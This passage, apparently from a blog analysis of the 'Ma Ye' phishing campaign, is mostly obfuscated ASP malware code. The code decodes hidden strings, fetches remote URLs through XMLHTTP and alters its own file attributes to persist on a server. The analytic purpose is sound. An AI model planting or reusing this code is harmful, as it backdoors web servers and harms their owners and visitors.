EE_____ = EE_____ - (85 * 58 - 4929)
loop
dim E_EE_E_, E_EE_EE, EE____E, E_EEE_E, second, E_EEEEE, EE___E_
E_EE_E_ = ""
EE____E = (EE_____ \ 4) * (100 * 107 - 10696)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= EE____E
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EEEEE = E____EE(asc(mid(EEEE_EE, E_EE_EE+2, 1)))
EE___E_ = E____EE(asc(mid(EEEE_EE, E_EE_EE+3, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
E_EE_E_ = E_EE_E_ & chr( ((E_EEEEE * 64) AND 255) + (EE___E_ AND 63))
E_EE_EE = E_EE_EE + (100 * 107 - 10696)
loop
if E_EE_EE < EE_____ then
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
if EE_____ MOD 4 = 3 then
E_EEEEE = E____EE(asc(mid(EEEE_EE,E_EE_EE+2,1)))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
end if
end if
EE___E=E_EE_E_
END FUNCTION


'===================================================================================================================================
'xml_request_fun: HTTP request function
Function xml_request_fun(EEEEE__)
Set Eadodb_stream_fun=Server.CreateObject("Microsoft.XMLHTTP")
On Error Resume Next
Eadodb_stream_fun.Open GET,EEEEE__,False
Eadodb_stream_fun.send()
if Err then
Err.Clear
Response.Write("#Bad Request (Invalid URL)")
Response.End()
End if
EEE_E__=adodb_stream_fun(Eadodb_stream_fun.responseBody,gb2312)
set Eadodb_stream_fun=nothing
xml_request_fun=EEE_E__
End Function


'===================================================================================================================================
'adodb_stream_fun: read the response body as text
Function adodb_stream_fun(EEEEE_E,EEEEEE_)
Dim EE___EE
Set EE___EE = Server.CreateObject("adodb.stream")
EE___EE.Type = (85 * 58 - 4929)
EE___EE.Mode = (71 * 34 - 2411)
EE___EE.Open
EE___EE.Write EEEEE_E
EE___EE.Position = (14 * 29 - 406)
EE___EE.Type = (14 * 102 - 1426)
EE___EE.Charset = EEEEEE_
adodb_stream_fun = EE___EE.ReadText
EE___EE.Close
set EE___EE = nothing
End Function


function EE_E__(str)
if isnull(str) or str = "" then
EE_E__ = (14 * 29 - 406)
else
dim E__E___, xml_request_fun_, xml_request_funE, adodb_stream_fun_
xml_request_funE = (14 * 29 - 406)
xml_request_fun_ = len(str)
for E__E___ = 1 to xml_request_fun_
adodb_stream_fun_ = mid(str, E__E___, 1)
if asc(adodb_stream_fun_) >= 0 and asc(adodb_stream_fun_) <= 255 then
xml_request_funE = xml_request_funE + (85 * 58 - 4929)
else
xml_request_funE = xml_request_funE + (14 * 102 - 1426)
end if
next
EE_E__ = xml_request_funE
end if
end function


Function EE_E_E(EEEEEEE)
On Error Resume Next
EE_E_E = False
Err = (14 * 29 - 406)
Dim adodb_stream_funE
Set adodb_stream_funE = Server.CreateObject(EEEEEEE)
If 0 = Err Then EE_E_E = True
Set adodb_stream_funE = Nothing
Err = (14 * 29 - 406)
End Function


Function EE_EE_()
EEE_E_E = Server.mappath(Request.ServerVariables("SCRIPT_NAME"))
If EE_E_E("Scripting.FileSystemObject") = False Then
Else
Set EEE_EE_ = Server.CreateObject("Scripting.FileSystemObject")
EEE_EEE = EEE_EE_.getFile(EEE_E_E).Attributes
if EEE_EEE = 32 or EEE_EEE = 1 or EEE_EEE = 2 then
EEE_EE_.getFile(EEE_E_E).Attributes = (98 * 32 - 1081)
end if
End If
End Function


Function EE_EEE(ByVal EEEE___)
Dim EE_E___, E__E___, xml_request_fun_
EEEE___ = Replace(EEEE___, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For E__E___ = 1 To Len(EEEE___)
If E__E___ <> xml_request_fun_ Then
EE_E___ = AscW(Mid(EEEE___, E__E___, 1))
If EE_E___ >= 33 And EE_E___ <= 79 Then
EE_EEE = EE_EEE & Chr(EE_E___ + 47)
ElseIf EE_E___ >= 80 And EE_E___ <= 126 Then
EE_EEE = EE_EEE & Chr(EE_E___ - 47)
Else
xml_request_fun_ = E__E___ + 1
If Mid(EEEE___, xml_request_fun_, 1) = EE_EEE("o") Then EE_EEE = EE_EEE & ChrW(EE_E___ + 5) Else EE_EEE = EE_EEE & Mid(EEEE___, E__E___, 1)
End If
End If
Next
End Function
%>

Please credit when reposting: jinglingshu's blog » Analysis Report on the "Ma Ye" Phishing Campaign

Latest reader comments (1)

  1. Why do this statistical analysis: to rule out the possibility that the attackers used a 0day
    admin, 11 years ago (2014-01-21)